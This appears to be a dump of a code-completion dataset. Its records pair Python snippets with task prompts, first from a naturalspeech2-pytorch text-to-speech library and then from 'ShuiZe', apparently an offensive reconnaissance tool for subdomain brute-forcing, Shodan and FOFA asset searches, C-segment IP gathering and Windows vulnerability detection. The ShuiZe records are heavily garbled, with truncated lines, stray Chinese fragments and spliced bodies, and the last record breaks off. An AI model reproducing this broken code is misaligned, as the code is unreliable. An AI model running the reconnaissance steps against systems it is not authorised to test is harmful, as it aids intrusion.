def compute_pitch_pytorch(wav, sample_rate):
#https://pytorch.org/audio/main/generated/torchaudio.functional.compute_kaldi_pitch.html#torchaudio.functional.compute_kaldi_pitch
pitch_feature = torchaudio.functional.compute_kaldi_pitch(wav, sample_rate)
pitch, nfcc = pitch_feature.unbind(dim = -1)
return pitch | null |
189,243 | import math
import copy
from multiprocessing import cpu_count
from pathlib import Path
from random import random
from functools import partial
from collections import namedtuple
import numpy as np
import torch
import torch.nn.functional as F
from torch import nn, einsum, Tensor
from torch.optim import Adam
from torch.utils.data import Dataset, DataLoader
import torchaudio
import torchaudio.transforms as T
from einops import rearrange, reduce, repeat
from einops.layers.torch import Rearrange, Reduce
from audiolm_pytorch import SoundStream, EncodecWrapper
from audiolm_pytorch.data import SoundDataset, get_dataloader
from beartype import beartype
from beartype.typing import Tuple, Union, Optional, List
from beartype.door import is_bearable
from naturalspeech2_pytorch.attend import Attend
from naturalspeech2_pytorch.aligner import Aligner, ForwardSumLoss, BinLoss
from naturalspeech2_pytorch.utils.tokenizer import Tokenizer, ESpeak
from naturalspeech2_pytorch.utils.utils import average_over_durations, create_mask
from naturalspeech2_pytorch.version import __version__
from accelerate import Accelerator
from ema_pytorch import EMA
from tqdm.auto import tqdm
import pyworld as pw
def divisible_by(num, den):
def compute_pitch_pyworld(wav, sample_rate, hop_length, pitch_fmax=640.0):
is_tensor_input = torch.is_tensor(wav)
if is_tensor_input:
device = wav.device
wav = wav.contiguous().cpu().numpy()
if divisible_by(len(wav), hop_length):
wav = np.pad(wav, (0, hop_length // 2), mode="reflect")
wav = wav.astype(np.double)
outs = []
for sample in wav:
f0, t = pw.dio(
sample,
fs = sample_rate,
f0_ceil = pitch_fmax,
frame_period = 1000 * hop_length / sample_rate,
)
f0 = pw.stonemask(sample, f0, t, sample_rate)
outs.append(f0)
outs = np.stack(outs)
if is_tensor_input:
outs = torch.from_numpy(outs).to(device)
return outs | null |
189,244 | import math
import copy
from multiprocessing import cpu_count
from pathlib import Path
from random import random
from functools import partial
from collections import namedtuple
import numpy as np
import torch
import torch.nn.functional as F
from torch import nn, einsum, Tensor
from torch.optim import Adam
from torch.utils.data import Dataset, DataLoader
import torchaudio
import torchaudio.transforms as T
from einops import rearrange, reduce, repeat
from einops.layers.torch import Rearrange, Reduce
from audiolm_pytorch import SoundStream, EncodecWrapper
from audiolm_pytorch.data import SoundDataset, get_dataloader
from beartype import beartype
from beartype.typing import Tuple, Union, Optional, List
from beartype.door import is_bearable
from naturalspeech2_pytorch.attend import Attend
from naturalspeech2_pytorch.aligner import Aligner, ForwardSumLoss, BinLoss
from naturalspeech2_pytorch.utils.tokenizer import Tokenizer, ESpeak
from naturalspeech2_pytorch.utils.utils import average_over_durations, create_mask
from naturalspeech2_pytorch.version import __version__
from accelerate import Accelerator
from ema_pytorch import EMA
from tqdm.auto import tqdm
import pyworld as pw
def log(t, eps = 1e-20):
return torch.log(t.clamp(min = eps))
def f0_to_coarse(f0, f0_bin = 256, f0_max = 1100.0, f0_min = 50.0):
f0_mel_max = 1127 * torch.log(1 + torch.tensor(f0_max) / 700)
f0_mel_min = 1127 * torch.log(1 + torch.tensor(f0_min) / 700)
f0_mel = 1127 * (1 + f0 / 700).log()
f0_mel[f0_mel > 0] = (f0_mel[f0_mel > 0] - f0_mel_min) * (f0_bin - 2) / (f0_mel_max - f0_mel_min) + 1
f0_mel[f0_mel <= 1] = 1
f0_mel[f0_mel > f0_bin - 1] = f0_bin - 1
f0_coarse = (f0_mel + 0.5).int()
assert f0_coarse.max() <= 255 and f0_coarse.min() >= 1, (f0_coarse.max(), f0_coarse.min())
return f0_coarse | null |
189,245 | import math
import copy
from multiprocessing import cpu_count
from pathlib import Path
from random import random
from functools import partial
from collections import namedtuple
import numpy as np
import torch
import torch.nn.functional as F
from torch import nn, einsum, Tensor
from torch.optim import Adam
from torch.utils.data import Dataset, DataLoader
import torchaudio
import torchaudio.transforms as T
from einops import rearrange, reduce, repeat
from einops.layers.torch import Rearrange, Reduce
from audiolm_pytorch import SoundStream, EncodecWrapper
from audiolm_pytorch.data import SoundDataset, get_dataloader
from beartype import beartype
from beartype.typing import Tuple, Union, Optional, List
from beartype.door import is_bearable
from naturalspeech2_pytorch.attend import Attend
from naturalspeech2_pytorch.aligner import Aligner, ForwardSumLoss, BinLoss
from naturalspeech2_pytorch.utils.tokenizer import Tokenizer, ESpeak
from naturalspeech2_pytorch.utils.utils import average_over_durations, create_mask
from naturalspeech2_pytorch.version import __version__
from accelerate import Accelerator
from ema_pytorch import EMA
from tqdm.auto import tqdm
import pyworld as pw
def Sequential(*mods):
return nn.Sequential(*filter(exists, mods))
def ConvBlock(dim, dim_out, kernel, dropout = 0.):
return nn.Sequential(
Rearrange('b n c -> b c n'),
nn.Conv1d(dim, dim_out, kernel, padding = kernel // 2),
nn.SiLU(),
nn.Dropout(dropout),
Rearrange('b c n -> b n c'),
) | null |
189,246 | import math
import copy
from multiprocessing import cpu_count
from pathlib import Path
from random import random
from functools import partial
from collections import namedtuple
import numpy as np
import torch
import torch.nn.functional as F
from torch import nn, einsum, Tensor
from torch.optim import Adam
from torch.utils.data import Dataset, DataLoader
import torchaudio
import torchaudio.transforms as T
from einops import rearrange, reduce, repeat
from einops.layers.torch import Rearrange, Reduce
from audiolm_pytorch import SoundStream, EncodecWrapper
from audiolm_pytorch.data import SoundDataset, get_dataloader
from beartype import beartype
from beartype.typing import Tuple, Union, Optional, List
from beartype.door import is_bearable
from naturalspeech2_pytorch.attend import Attend
from naturalspeech2_pytorch.aligner import Aligner, ForwardSumLoss, BinLoss
from naturalspeech2_pytorch.utils.tokenizer import Tokenizer, ESpeak
from naturalspeech2_pytorch.utils.utils import average_over_durations, create_mask
from naturalspeech2_pytorch.version import __version__
from accelerate import Accelerator
from ema_pytorch import EMA
from tqdm.auto import tqdm
import pyworld as pw
def Sequential(*mods):
return nn.Sequential(*filter(exists, mods))
class CausalConv1d(nn.Conv1d):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
kernel_size, = self.kernel_size
dilation, = self.dilation
stride, = self.stride
assert stride == 1
self.causal_padding = dilation * (kernel_size - 1)
def forward(self, x):
causal_padded_x = F.pad(x, (self.causal_padding, 0), value = 0.)
return super().forward(causal_padded_x)
class GEGLU(nn.Module):
def forward(self, x):
x, gate = x.chunk(2, dim = -1)
return F.gelu(gate) * x
def FeedForward(dim, mult = 4, causal_conv = False):
dim_inner = int(dim * mult * 2 / 3)
conv = None
if causal_conv:
conv = nn.Sequential(
Rearrange('b n d -> b d n'),
CausalConv1d(dim_inner, dim_inner, 3),
Rearrange('b d n -> b n d'),
)
return Sequential(
nn.Linear(dim, dim_inner * 2),
GEGLU(),
conv,
nn.Linear(dim_inner, dim)
) | null |
189,247 | import math
import copy
from multiprocessing import cpu_count
from pathlib import Path
from random import random
from functools import partial
from collections import namedtuple
import numpy as np
import torch
import torch.nn.functional as F
from torch import nn, einsum, Tensor
from torch.optim import Adam
from torch.utils.data import Dataset, DataLoader
import torchaudio
import torchaudio.transforms as T
from einops import rearrange, reduce, repeat
from einops.layers.torch import Rearrange, Reduce
from audiolm_pytorch import SoundStream, EncodecWrapper
from audiolm_pytorch.data import SoundDataset, get_dataloader
from beartype import beartype
from beartype.typing import Tuple, Union, Optional, List
from beartype.door import is_bearable
from naturalspeech2_pytorch.attend import Attend
from naturalspeech2_pytorch.aligner import Aligner, ForwardSumLoss, BinLoss
from naturalspeech2_pytorch.utils.tokenizer import Tokenizer, ESpeak
from naturalspeech2_pytorch.utils.utils import average_over_durations, create_mask
from naturalspeech2_pytorch.version import __version__
from accelerate import Accelerator
from ema_pytorch import EMA
from tqdm.auto import tqdm
import pyworld as pw
def safe_div(numer, denom):
return numer / denom.clamp(min = 1e-10) | null |
189,248 | import math
import copy
from multiprocessing import cpu_count
from pathlib import Path
from random import random
from functools import partial
from collections import namedtuple
import numpy as np
import torch
import torch.nn.functional as F
from torch import nn, einsum, Tensor
from torch.optim import Adam
from torch.utils.data import Dataset, DataLoader
import torchaudio
import torchaudio.transforms as T
from einops import rearrange, reduce, repeat
from einops.layers.torch import Rearrange, Reduce
from audiolm_pytorch import SoundStream, EncodecWrapper
from audiolm_pytorch.data import SoundDataset, get_dataloader
from beartype import beartype
from beartype.typing import Tuple, Union, Optional, List
from beartype.door import is_bearable
from naturalspeech2_pytorch.attend import Attend
from naturalspeech2_pytorch.aligner import Aligner, ForwardSumLoss, BinLoss
from naturalspeech2_pytorch.utils.tokenizer import Tokenizer, ESpeak
from naturalspeech2_pytorch.utils.utils import average_over_durations, create_mask
from naturalspeech2_pytorch.version import __version__
from accelerate import Accelerator
from ema_pytorch import EMA
from tqdm.auto import tqdm
import pyworld as pw
def right_pad_dims_to(x, t):
padding_dims = x.ndim - t.ndim
if padding_dims <= 0:
return t
return t.view(*t.shape, *((1,) * padding_dims)) | null |
189,249 | import math
import copy
from multiprocessing import cpu_count
from pathlib import Path
from random import random
from functools import partial
from collections import namedtuple
import numpy as np
import torch
import torch.nn.functional as F
from torch import nn, einsum, Tensor
from torch.optim import Adam
from torch.utils.data import Dataset, DataLoader
import torchaudio
import torchaudio.transforms as T
from einops import rearrange, reduce, repeat
from einops.layers.torch import Rearrange, Reduce
from audiolm_pytorch import SoundStream, EncodecWrapper
from audiolm_pytorch.data import SoundDataset, get_dataloader
from beartype import beartype
from beartype.typing import Tuple, Union, Optional, List
from beartype.door import is_bearable
from naturalspeech2_pytorch.attend import Attend
from naturalspeech2_pytorch.aligner import Aligner, ForwardSumLoss, BinLoss
from naturalspeech2_pytorch.utils.tokenizer import Tokenizer, ESpeak
from naturalspeech2_pytorch.utils.utils import average_over_durations, create_mask
from naturalspeech2_pytorch.version import __version__
from accelerate import Accelerator
from ema_pytorch import EMA
from tqdm.auto import tqdm
import pyworld as pw
def simple_linear_schedule(t, clip_min = 1e-9):
return (1 - t).clamp(min = clip_min) | null |
189,250 | import math
import copy
from multiprocessing import cpu_count
from pathlib import Path
from random import random
from functools import partial
from collections import namedtuple
import numpy as np
import torch
import torch.nn.functional as F
from torch import nn, einsum, Tensor
from torch.optim import Adam
from torch.utils.data import Dataset, DataLoader
import torchaudio
import torchaudio.transforms as T
from einops import rearrange, reduce, repeat
from einops.layers.torch import Rearrange, Reduce
from audiolm_pytorch import SoundStream, EncodecWrapper
from audiolm_pytorch.data import SoundDataset, get_dataloader
from beartype import beartype
from beartype.typing import Tuple, Union, Optional, List
from beartype.door import is_bearable
from naturalspeech2_pytorch.attend import Attend
from naturalspeech2_pytorch.aligner import Aligner, ForwardSumLoss, BinLoss
from naturalspeech2_pytorch.utils.tokenizer import Tokenizer, ESpeak
from naturalspeech2_pytorch.utils.utils import average_over_durations, create_mask
from naturalspeech2_pytorch.version import __version__
from accelerate import Accelerator
from ema_pytorch import EMA
from tqdm.auto import tqdm
import pyworld as pw
def cosine_schedule(t, start = 0, end = 1, tau = 1, clip_min = 1e-9):
power = 2 * tau
v_start = math.cos(start * math.pi / 2) ** power
v_end = math.cos(end * math.pi / 2) ** power
output = math.cos((t * (end - start) + start) * math.pi / 2) ** power
output = (v_end - output) / (v_end - v_start)
return output.clamp(min = clip_min) | null |
189,251 | import math
import copy
from multiprocessing import cpu_count
from pathlib import Path
from random import random
from functools import partial
from collections import namedtuple
import numpy as np
import torch
import torch.nn.functional as F
from torch import nn, einsum, Tensor
from torch.optim import Adam
from torch.utils.data import Dataset, DataLoader
import torchaudio
import torchaudio.transforms as T
from einops import rearrange, reduce, repeat
from einops.layers.torch import Rearrange, Reduce
from audiolm_pytorch import SoundStream, EncodecWrapper
from audiolm_pytorch.data import SoundDataset, get_dataloader
from beartype import beartype
from beartype.typing import Tuple, Union, Optional, List
from beartype.door import is_bearable
from naturalspeech2_pytorch.attend import Attend
from naturalspeech2_pytorch.aligner import Aligner, ForwardSumLoss, BinLoss
from naturalspeech2_pytorch.utils.tokenizer import Tokenizer, ESpeak
from naturalspeech2_pytorch.utils.utils import average_over_durations, create_mask
from naturalspeech2_pytorch.version import __version__
from accelerate import Accelerator
from ema_pytorch import EMA
from tqdm.auto import tqdm
import pyworld as pw
def sigmoid_schedule(t, start = -3, end = 3, tau = 1, clamp_min = 1e-9):
v_start = torch.tensor(start / tau).sigmoid()
v_end = torch.tensor(end / tau).sigmoid()
gamma = (-((t * (end - start) + start) / tau).sigmoid() + v_end) / (v_end - v_start)
return gamma.clamp_(min = clamp_min, max = 1.) | null |
189,252 | import math
import copy
from multiprocessing import cpu_count
from pathlib import Path
from random import random
from functools import partial
from collections import namedtuple
import numpy as np
import torch
import torch.nn.functional as F
from torch import nn, einsum, Tensor
from torch.optim import Adam
from torch.utils.data import Dataset, DataLoader
import torchaudio
import torchaudio.transforms as T
from einops import rearrange, reduce, repeat
from einops.layers.torch import Rearrange, Reduce
from audiolm_pytorch import SoundStream, EncodecWrapper
from audiolm_pytorch.data import SoundDataset, get_dataloader
from beartype import beartype
from beartype.typing import Tuple, Union, Optional, List
from beartype.door import is_bearable
from naturalspeech2_pytorch.attend import Attend
from naturalspeech2_pytorch.aligner import Aligner, ForwardSumLoss, BinLoss
from naturalspeech2_pytorch.utils.tokenizer import Tokenizer, ESpeak
from naturalspeech2_pytorch.utils.utils import average_over_durations, create_mask
from naturalspeech2_pytorch.version import __version__
from accelerate import Accelerator
from ema_pytorch import EMA
from tqdm.auto import tqdm
import pyworld as pw
def gamma_to_alpha_sigma(gamma, scale = 1):
return torch.sqrt(gamma) * scale, torch.sqrt(1 - gamma) | null |
189,253 | import math
import copy
from multiprocessing import cpu_count
from pathlib import Path
from random import random
from functools import partial
from collections import namedtuple
import numpy as np
import torch
import torch.nn.functional as F
from torch import nn, einsum, Tensor
from torch.optim import Adam
from torch.utils.data import Dataset, DataLoader
import torchaudio
import torchaudio.transforms as T
from einops import rearrange, reduce, repeat
from einops.layers.torch import Rearrange, Reduce
from audiolm_pytorch import SoundStream, EncodecWrapper
from audiolm_pytorch.data import SoundDataset, get_dataloader
from beartype import beartype
from beartype.typing import Tuple, Union, Optional, List
from beartype.door import is_bearable
from naturalspeech2_pytorch.attend import Attend
from naturalspeech2_pytorch.aligner import Aligner, ForwardSumLoss, BinLoss
from naturalspeech2_pytorch.utils.tokenizer import Tokenizer, ESpeak
from naturalspeech2_pytorch.utils.utils import average_over_durations, create_mask
from naturalspeech2_pytorch.version import __version__
from accelerate import Accelerator
from ema_pytorch import EMA
from tqdm.auto import tqdm
import pyworld as pw
def log(t, eps = 1e-20):
return torch.log(t.clamp(min = eps))
def gamma_to_log_snr(gamma, scale = 1, eps = 1e-5):
return log(gamma * (scale ** 2) / (1 - gamma), eps = eps) | null |
189,254 | import math
import copy
from multiprocessing import cpu_count
from pathlib import Path
from random import random
from functools import partial
from collections import namedtuple
import numpy as np
import torch
import torch.nn.functional as F
from torch import nn, einsum, Tensor
from torch.optim import Adam
from torch.utils.data import Dataset, DataLoader
import torchaudio
import torchaudio.transforms as T
from einops import rearrange, reduce, repeat
from einops.layers.torch import Rearrange, Reduce
from audiolm_pytorch import SoundStream, EncodecWrapper
from audiolm_pytorch.data import SoundDataset, get_dataloader
from beartype import beartype
from beartype.typing import Tuple, Union, Optional, List
from beartype.door import is_bearable
from naturalspeech2_pytorch.attend import Attend
from naturalspeech2_pytorch.aligner import Aligner, ForwardSumLoss, BinLoss
from naturalspeech2_pytorch.utils.tokenizer import Tokenizer, ESpeak
from naturalspeech2_pytorch.utils.utils import average_over_durations, create_mask
from naturalspeech2_pytorch.version import __version__
from accelerate import Accelerator
from ema_pytorch import EMA
from tqdm.auto import tqdm
import pyworld as pw
def cycle(dl):
while True:
for data in dl:
yield data | null |
189,255 | import logging
import re
import subprocess
from typing import Dict, List
from packaging.version import Version
from naturalspeech2_pytorch.utils.phonemizers.base import BasePhonemizer
from naturalspeech2_pytorch.utils.phonemizers.punctuation import Punctuation
def is_tool(name):
from shutil import which
return which(name) is not None | null |
189,256 | import logging
import re
import subprocess
from typing import Dict, List
from packaging.version import Version
from naturalspeech2_pytorch.utils.phonemizers.base import BasePhonemizer
from naturalspeech2_pytorch.utils.phonemizers.punctuation import Punctuation
espeak_version_pattern = re.compile(r"text-to-speech:\s(?P<version>\d+\.\d+(\.\d+)?)")
def get_espeak_version():
output = subprocess.getoutput("espeak --version")
match = espeak_version_pattern.search(output)
return match.group("version") | null |
189,257 | import logging
import re
import subprocess
from typing import Dict, List
from packaging.version import Version
from naturalspeech2_pytorch.utils.phonemizers.base import BasePhonemizer
from naturalspeech2_pytorch.utils.phonemizers.punctuation import Punctuation
def get_espeakng_version():
output = subprocess.getoutput("espeak-ng --version")
return output.split()[3] | null |
189,258 | import logging
import re
import subprocess
from typing import Dict, List
from packaging.version import Version
from naturalspeech2_pytorch.utils.phonemizers.base import BasePhonemizer
from naturalspeech2_pytorch.utils.phonemizers.punctuation import Punctuation
The provided code snippet includes necessary dependencies for implementing the `_espeak_exe` function. Write a Python function `def _espeak_exe(espeak_lib: str, args: List, sync=False) -> List[str]` to solve the following problem:
Run espeak with the given arguments.
Here is the function:
def _espeak_exe(espeak_lib: str, args: List, sync=False) -> List[str]:
"""Run espeak with the given arguments."""
cmd = [
espeak_lib,
"-q",
"-b",
"1", # UTF8 text encoding
]
cmd.extend(args)
logging.debug("espeakng: executing %s", repr(cmd))
with subprocess.Popen(
cmd,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
) as p:
res = iter(p.stdout.readline, b"")
if not sync:
p.stdout.close()
if p.stderr:
p.stderr.close()
if p.stdin:
p.stdin.close()
return res
res2 = []
for line in res:
res2.append(line)
p.stdout.close()
if p.stderr:
p.stderr.close()
if p.stdin:
p.stdin.close()
p.wait()
return res2 | Run espeak with the given arguments. |
189,259 | import torch
from torch import Tensor
from typing import Callable, List, Optional, Tuple
from torch.nn.utils.rnn import pad_sequence
from naturalspeech2_pytorch.utils.cleaner import TextProcessor
from naturalspeech2_pytorch.utils.phonemizers.espeak_wrapper import ESpeak
def exists(val):
def default(val, d):
return val if exists(val) else d | null |
189,260 | import torch
from einops import repeat, rearrange
The provided code snippet includes necessary dependencies for implementing the `average_over_durations` function. Write a Python function `def average_over_durations(values, durs)` to solve the following problem:
- in: - values: B, 1, T_de - durs: B, T_en - out: - avg: B, 1, T_en
Here is the function:
def average_over_durations(values, durs):
"""
- in:
- values: B, 1, T_de
- durs: B, T_en
- out:
- avg: B, 1, T_en
"""
durs_cums_ends = torch.cumsum(durs, dim=1).long()
durs_cums_starts = torch.nn.functional.pad(durs_cums_ends[:, :-1], (1, 0))
values_nonzero_cums = torch.nn.functional.pad(torch.cumsum(values != 0.0, dim=2), (1, 0))
values_cums = torch.nn.functional.pad(torch.cumsum(values, dim=2), (1, 0))
bs, l = durs_cums_ends.size()
n_formants = values.size(1)
dcs = repeat(durs_cums_starts, 'bs l -> bs n l', n=n_formants)
dce = repeat(durs_cums_ends, 'bs l -> bs n l', n=n_formants)
values_sums = (torch.gather(values_cums, 2, dce) - torch.gather(values_cums, 2, dcs)).to(values.dtype)
values_nelems = (torch.gather(values_nonzero_cums, 2, dce) - torch.gather(values_nonzero_cums, 2, dcs)).to(values.dtype)
avg = torch.where(values_nelems == 0.0, values_nelems, values_sums / values_nelems).to(values.dtype)
return avg | - in: - values: B, 1, T_de - durs: B, T_en - out: - avg: B, 1, T_en |
189,261 | import torch
from einops import repeat, rearrange
def create_mask(sequence_length, max_len):
dtype, device = sequence_length.dtype, sequence_length.device
seq_range = torch.arange(max_len, dtype=dtype, device=device)
sequence_length = rearrange(sequence_length, 'b -> b 1')
seq_range = rearrange(seq_range, 't -> 1 t')
return seq_range < sequence_length | null |
189,262 | import sys
import os
import urllib3
import openpyxl
from uuid import uuid4
import dns.resolver
import re
from threading import Thread
from IPy import IP
from collections import Counter
from queue import Queue
from urllib.parse import urlparse
from termcolor import cprint
from optparse import OptionParser
import os
import platform
from Plugins.saveToExcel import saveToExcel
from uuid import uuid4
import socket
import socks
import configparser
from tqdm import *
from colorama import Fore
import requests
():
cprint('-' * 50 + 'Load subdomains3 ...' + '-' * 50, 'green')
from Plugins.infoGather.subdomain.subdomain3.brutedns import run_subdomains
Subdomains_ips = run_subdomains(domain)
return Subdomains_ips
():
cprint('-' * 50 + 'Load getSocksProxy ...' + '-' * 50, 'green')
from Plugins.infoGather.SocksProxy.getSocksProxy import run_getSocksProxy
cprint('-' * 50 + 'Load beian2NewDomain ...' + '-' * 50, 'green')
from Plugins.infoGather.subdomain.beian2NewDomain.beian2domain import run_beian2domain
cprint('-' * 50 + 'Load Aiqicha ...' + '-' * 50, 'green')
cprint("查询【{}】公司架构".format(companyName), 'red')
from Plugins.infoGather.subdomain.Aiqicha.Aiqicha import run_aiqicha
():
cprint('-' * 50 + 'check Pan-Analysis ...' + '-' * 50, 'green')
cprint('-' * 50 + 'Load ksubdomain ...' + '-' * 50, 'green')
from Plugins.infoGather.subdomain.ksubdomain.ksubdomain import run_ksubdomain
():
cprint('-' * 50 + 'Load theHarvest ...' + '-' * 50, 'green')
from Plugins.infoGather.subdomain.theHarvester.theHarvester import run_theHarvester
subdomain = None
* 50 + 'Load verifyEmails ...' + '-' * 50, 'green')
from Plugins.infoGather.subdomain.verifyEmails.VerifyEmails import run_verifyEmails
cprint('-' * 50 + 'Load VirusTotal threatcrowd url.fht.im ...' + '-' * 50, 'green')
from Plugins.infoGather.subdomain.othersApiSubdomains.othersApiSubdomains import othersApiRun
():
cprint('-' * 50 + 'Load Github Api Subdomain ...' + '-' * 50, 'green')
from Plugins.infoGather.subdomain.githubSubdomains.githubSubdomains import githubApiRun
from Plugins.infoGather.subdomain.Sublist3r.sublist3r import sublist3rRun
cprint('-' * 50 + 'Load Spider ...' + '-' * 50, 'green')
cprint('-' * 50 + 'Load crawlCerts ...' + '-' * 50, 'green') ugins.infoGather.subdomain.Certs.crawlCerts import crawlCerts
ugins.infoGather.subdomain.FriendChins.crawlFriendChins import FriendChins
Subdomains_ips,
cprint('-' * 50 + 'check subdomains CDN and query ip ...' + '-' * 50, 'green')
for subdomain in subdomains:
if '.{}'.format(domain) in subdomain:
tmp_subdomains.append(subdomain)
from Plugins.infoGather.subdomain.CDN import checkCDN
from Plugins.infoGather.subdomain.queryA import queryA
Subdomains_ips = queryA.run_queryA(Subdomains_ips, subdomains)
return Subdomains_ips, CDNSubdomainsDict, notCDNSubdomain(Subdomains_ips):
cprint('-' * 50 + 'run_hostCollide ...' + '-' * 50, 'green') s.infoGather.subdomain.hostCollide import hostCollide
s.infoGather.ParamSpider.paramSpider import getParamLinks
Subdomains_ips, CDNSubdomainsDict,
cprint('-' * 50 + 'get_CIP ...' + '-' * 50, 'green')
for subdomain in Subdomains_ips:
if CDNSubdomainsDict[subdomain] == 'NOT': # 如果该子域名没有CDN,则开始统计解析出来的IP
ip_List = Subdomains_ips[subdomain]
for ip in ip_List:
if not is_internal_ip(ip):
ips.append(ip)
cprint(ip_count, 'red')
import configparser
cprint('-' * 50 + 'run_webSpace ...' + '-' * 50, 'green') s.infoGather.WebspaceSearchEngine import fofaApi, shodanApi, quakeApi, qianxinApi
ins.infoGather.subdomain.ip2domain import getIp2Domain
一个i
s.infoGather.subdomain.ipAddress import getIpAddress
cprint('-' * 50 + 'collation_web_host ...' + '-' * 50, 'green') domain in list(set(list(Subdomains_ips.keys()) + ip2domainSubdomains)):
if ':' in subdomain: # ip2domainSubdomains的结果里有些类似于221.192.236.146:999这种结果,所以不加80端口
web_host_port_temp.append(subdomain)
else:
web_host_port_temp.append('{}:80'.format(subdomain))
from Plugins.infoGather.Intranet import getMoreIp
infoGather.webInfo import getWebTitle
域
cprint('-' * 50 + 'detect Windows vul' + '-' * 50, 'green')
创
反查域
Subdomains_ips = {}
eryA_subdomains(Subdomains_ips, subdomains)
bdomain in notCDNSubdomains:
for ip in Subdomains_ips[subdomain]:
SubdomainAndNotCDNIPs.append(ip)
Space_web_host_port, webSpace_service_host_port = run_webSpace(domain, SubdomainAndNotCDNIPs, [], '')
else:
webSpace_web_host_port, webSpace_service_host_port = run_webSpace(domain, [], CIP_List, '') # 网络空间引擎(fofa、shodan)获取的开放web服务的host(IP/domain)
for subdomain in Subdomains_ips.keys():
for ip in Subdomains_ips[subdomain]:
allTargets_Queue.put(ip)
allTargets_List.append(ip)
cprint(r'新的域名:{}'.format(newDomains), 'green')
cprint(r'C段IP:{}'.format(CIP_List), 'green')
cprint(r'资产信息保存路径:{}'.format('{}/{}.xlsx'.format(save_fold_path, excel_name)), 'green')
cprint(r'Github信息保存路径:{}/{}_github.txt'.format(save_fold_path, domain), 'green')
if domain:
ret = ""
for cip in CIP_List:
ret += cip
ret += ","
cprint(r"请使用-c功能跑C段资产", 'green')
cprint(r"python3 ShuiZe.py -c {}".format(ret[:-1]), 'red')
cprint(r'新的域名:{}'.format(newDomains), 'green')
cprint(r'C段IP:{}'.format(CIP_List), 'green')
cprint(r'资产信息保存路径:{}'.format('{}/{}.xlsx'.format(save_fold_path, excel_name)), 'green')
cprint(r'Github信息保存路径:{}/{}_github.txt'.format(save_fold_path, domain), 'green')
ranetWeb():
cprint(r'保存路径:{}'.format('{}/{}.xlsx'.format(save_fold_path, excel_name)), 'green')
cprint(r'保存路径:{}'.format('{}/{}.xlsx'.format(save_fold_path, excel_name)), 'green')
cprint(r'保存路径:{}'.format('{}/{}.xlsx'.format(save_fold_path, excel_name)), 'green')
cprint(r'保存路径:{}'.format('{}/{}.xlsx'.format(save_fold_path, excel_name)), 'green')
File = o
cprint(r'保存路径:{}'.format('{}/{}.xlsx'.format(save_fold_path, excel_name)), 'green')
def run_subdomains(domain):
args = {'cname': 'y', 'default_dns': 'n', 'domain': domain, 'file': None, 'level': 3,
'next_sub_file': './iniFile/subdomain3/next_sub_full.txt', 'other_file': None, 'speed': 'fast', 'sub_file': './iniFile/subdomain3/sub_full.txt'}
Subdomains_ips = {}
brute = Brutedomain(args, Subdomains_ips)
try:
brute.run()
# if ('y' in brute.cname_flag or 'Y' in brute.cname_flag):
# brute.collect_cname()
except KeyboardInterrupt:
print('user stop')
return Subdomains_ips
def subdomains3():
cprint('-' * 50 + 'Load subdomains3 ...' + '-' * 50, 'green')
from Plugins.infoGather.subdomain.subdomain3.brutedns import run_subdomains
Subdomains_ips = run_subdomains(domain)
return Subdomains_ips | null |
189,263 | import sys
import os
import urllib3
import openpyxl
from uuid import uuid4
import dns.resolver
import re
from threading import Thread
from IPy import IP
from collections import Counter
from queue import Queue
from urllib.parse import urlparse
from termcolor import cprint
from optparse import OptionParser
import os
import platform
from Plugins.saveToExcel import saveToExcel
from uuid import uuid4
import socket
import socks
import configparser
from tqdm import *
from colorama import Fore
import requests
from Plugins.infoGather.subdomain.subdomain3.brutedns import run_subdomains
from Plugins.infoGather.SocksProxy.getSocksProxy import run_getSocksProxy
from Plugins.infoGather.subdomain.beian2NewDomain.beian2domain import run_beian2domain
ns.infoGather.subdomain.Aiqicha.Aiqicha import run_aiqicha
from Plugins.infoGather.subdomain.ksubdomain.ksubdomain import run_ksubdomain
from Plugins.infoGather.subdomain.theHarvester.theHarvester import run_theHarvester
from Plugins.infoGather.subdomain.verifyEmails.VerifyEmails import run_verifyEmails
from Plugins.infoGather.subdomain.othersApiSubdomains.othersApiSubdomains import othersApiRun
from Plugins.infoGather.subdomain.githubSubdomains.githubSubdomains import githubApiRun
from Plugins.infoGather.subdomain.Sublist3r.sublist3r import sublist3rRun
ugins.infoGather.subdomain.Certs.crawlCerts import crawlCerts
ugins.infoGather.subdomain.FriendChins.crawlFriendChins import FriendChins
from Plugins.infoGather.subdomain.CDN import checkCDN
from Plugins.infoGather.subdomain.queryA import queryA
s.infoGather.subdomain.hostCollide import hostCollide
s.infoGather.ParamSpider.paramSpider import getParamLinks
import configparser
s.infoGather.WebspaceSearchEngine import fofaApi, shodanApi, quakeApi, qianxinApi
ins.infoGather.subdomain.ip2domain import getIp2Domain
一个i
s.infoGather.subdomain.ipAddress import getIpAddress
from Plugins.infoGather.Intranet import getMoreIp
infoGather.webInfo import getWebTitle
域
创
反查域
def dnsZoneTransfer():
pass | null |
189,264 | import sys
import os
import urllib3
import openpyxl
from uuid import uuid4
import dns.resolver
import re
from threading import Thread
from IPy import IP
from collections import Counter
from queue import Queue
from urllib.parse import urlparse
from termcolor import cprint
from optparse import OptionParser
import os
import platform
from Plugins.saveToExcel import saveToExcel
from uuid import uuid4
import socket
import socks
import configparser
from tqdm import *
from colorama import Fore
import requests
list(set(new_subdomains + old_subdomains)():
cprint('-' * 50 + 'Load subdomains3 ...' + '-' * 50, 'green')
from Plugins.infoGather.subdomain.subdomain3.brutedns import run_subdomains
():
cprint('-' * 50 + 'Load getSocksProxy ...' + '-' * 50, 'green')
from Plugins.infoGather.SocksProxy.getSocksProxy import run_getSocksProxy
cprint('-' * 50 + 'Load beian2NewDomain ...' + '-' * 50, 'green')
from Plugins.infoGather.subdomain.beian2NewDomain.beian2domain import run_beian2domain
cprint('-' * 50 + 'Load Aiqicha ...' + '-' * 50, 'green')
cprint("查询【{}】公司架构".format(companyName), 'red')
from Plugins.infoGather.subdomain.Aiqicha.Aiqicha import run_aiqicha
():
cprint('-' * 50 + 'check Pan-Analysis ...' + '-' * 50, 'green')
cprint('-' * 50 + 'Load ksubdomain ...' + '-' * 50, 'green')
from Plugins.infoGather.subdomain.ksubdomain.ksubdomain import run_ksubdomain
():
cprint('-' * 50 + 'Load theHarvest ...' + '-' * 50, 'green')
from Plugins.infoGather.subdomain.theHarvester.theHarvester import run_theHarvester
theHarvesterIp, emails, hosts = run_theHarvester(domain)
print(hosts)
theHarvesterSubdomains = []
subdomain = None
for host in list(set(hosts)):
if '/' not in host and ' ' not in host:
domain_ip = host.strip().split(':')
